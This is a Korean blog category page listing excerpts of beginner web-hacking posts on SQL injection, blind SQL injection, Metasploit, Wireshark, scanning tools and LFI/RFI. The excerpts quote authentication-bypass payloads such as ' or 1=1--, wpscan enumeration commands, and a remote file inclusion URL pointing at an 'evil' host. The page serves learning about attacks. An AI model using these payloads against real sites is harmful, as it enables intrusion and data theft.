웹 해킹/웹 해킹 개념19 sql에서 연산자의 우선순위 sql에서 연산자의 우선순위 괄호>not>and>or 2018. 2. 9. blind sql injection 참고 사이트 http://kcats.tistory.com/121 https://www.w3resource.com/mysql/string-functions/mysql-substr-function.phpBlind SQL injection은 다음과 같은 특정한 상황에서 사용 가능하다. 1. 쿼리문으로 참과 거짓 일때의 서버의 반응을 알 수 있어야 한다.2. 원하는 겨로가를 얻을 데이터베이스의 이름을 알 수 있어야 한다. 이러한 상황일 때 쿼리 문의 ascii, limit, substr 등의 구문을 이용한다. 1. ascii는 ascii(문자)를 하였을 때, 해당 문자의 아스키코드를 반환한다.2. limit은 출력의 개수를 제한할 수 있는 함수이다.limit 200이라고 하면 출력 개수를 최대 200개로 제한한.. 2018. 2. 9. SQL인젝션 SQL인젝션 공격 방법을 정리하고자 한다. 참고 사이트 http://mrrootable.tistory.com/25https://technet.microsoft.com/ko-kr/library/ms189288(v=sql.90).aspx 1. 인증 우회(Auth Bypass) SQL 쿼리 문의 TRUE/False 의 논리적 연산 오류를 이용하여 로그인 인증 쿼리문이 무조건 TRUE의 결과 값이 나오게 하여 인증을 무력화시키는 기법 ' or 1=1-- ' or 1=1# (MySQL인 경우)' or 'dog'='dog'-- ' or 'ab'='a'+'b'-- ' or 2>1-- MySQL에서 주석처리 -- (하이픈 2개와 스페이스 1개) # 2. 데이터 노출(Data Disclosure) 타겟 시스템의 주요 데.. 2018. 2. 8. [웹 해킹 입문] 7. Metasploit Metasploit 메타스플로잇은 방대한 취약점 DB를 이용하여 악성 코드를 작성하여 배포한다. 메타스플로잇의 가장 큰 특징은 내부 프레임워크를 사용하여 쉽게 익스플로잇 코드를 만든다는 점이다.즉, 우리가 하나하나 코딩할 필요가 없다는 뜻이다. 바로 바이러스로 인식! 2018. 1. 16. [웹 해킹 입문] 6. WireShark WireShark 네트워크 패킷을 캡처하고 분석하는 오픈소스 도구 PCAP(Packet Capture)은 네트워크 트래픽을 캡처하는 API 구성이다.와이어샤크는 자체 프로그램으로 네트워크 트래픽을 캡쳐하는 것이 아니고, 운영체제에서 지원하는 캡처 라이브러리를 이용하여 수집! 스니핑은 네트워크 패킷을 잡는 기술을 말한다. 네트워크 카드-Normal Mode-Promiscuous Mode pcapng포맷으로 로그인성공시 와이어샤크로 캡처하고 저장한다. 2018. 1. 16. [웹 해킹 입문] 5. 스캔 해킹 전에 시스템의 상태를 파악할 수 있는 도구!->스캐닝 도구! 스캐닝 도구는 서버의 상태, 사양, 취약점 및 각종 정보를 쉽게 탐색보완환경이 잘 갖춰진 조직이나 기관은 이러한 도구의 사용을 바로 탐지할 수 있는 장비를 갖춤 주요스캐닝 도구-> WPSCAN, Nmap, Nikto, Netcat 1) WPSCAN WPScan은워드프레스 관련 취약점을 점검하는 도구이다. 워드프레스를 위한 전용 점검 도구로 간단한 명령으로 많은 취약점을 파악한다.WPScan은 기존의 취약점을 데이터베이스화하여 사용자에게 취약 정보를 제공한다. wpscan --url ~~~ --enumerate p //해당 워드프레스에 설치된 플러그인을 열거한다wpscan --url ~~~ --enumerate u //user name:id.. 2018. 1. 16. [웹 해킹 입문] 4. LFI&RFI LFI&RFI LFI 와 RFI는 Local과 Remote에 대한 File Inclusion(파일 포함) 을 말한다. 해킹으로 말하자면, LFI와 RFI를 이용하여 웹 서버에 악성 코드를 넣는 기법이다. 가장 대표적인 것이 PHP의 include함수이다.이 함수의 역할은 특정 파일을 포함시켜 스크립트를 실행한다. vars.php의 소스코드는 다음과 같다! 또한 include함수는 php가 아닌 텍스트도 동일하게 포함시켜 실행한다. LFI: 서버에 FTP나 자료실로 악성 코드를 업로드시켜 include 시킴vulnerable.php?COLOR=C:\\ftp\upload\\exploit.txt RFI: 외부서버의 악성코드를 불러와 include 시킴vulnerable.php?COLOR=http://evil... 2018. 1. 15. sqlmap sqlmap 여러 SQL 구문의 조합을 통해->sql injectionsqlmap은 파이썬으로 개발된 오픈소스사이트 url을 통해 SQL인젝션 취약점을 찾는다. 디비 완전 다 뚫림!! 취약점으로 인해 다른 테이블까지 다 뚫렸다! 비밀번호 dictionary attack까지 해준다! 2018. 1. 15. [웹 해킹 입문] 3. SQL 인젝션 SQL 인젝션-인증우회-기밀데이터 접근-웹 사이트 콘텐츠 변경-DB 서버 shutdown 특수문자를 입력하여 SQL 인젝션 실행작은따옴표('), 주석 처리에 사용하는 하이픈(-) PHP에서는 작은따옴표의 취약점을 막도록 다음과 같이 2가지를 지원한다.1) 함수 addslashes()를 이용하여 작은따옴쵸 기호 앞에 역슬래시(\) 추가2) php.ini의 magic_quotes_gpc 옵션 활성화(On)->get, post, cookie를 사용하여 넘어온 변숫값에 quotes(',",\, NULL등)가 있으면 자동으로 앞에 역슬래시(\)를 붙인다. 1. ' or '1'='1select user_login, user_pass, user_email FROM wp_userswhere user_login='' o.. 2018. 1. 8. 이전 1 2 3 다음
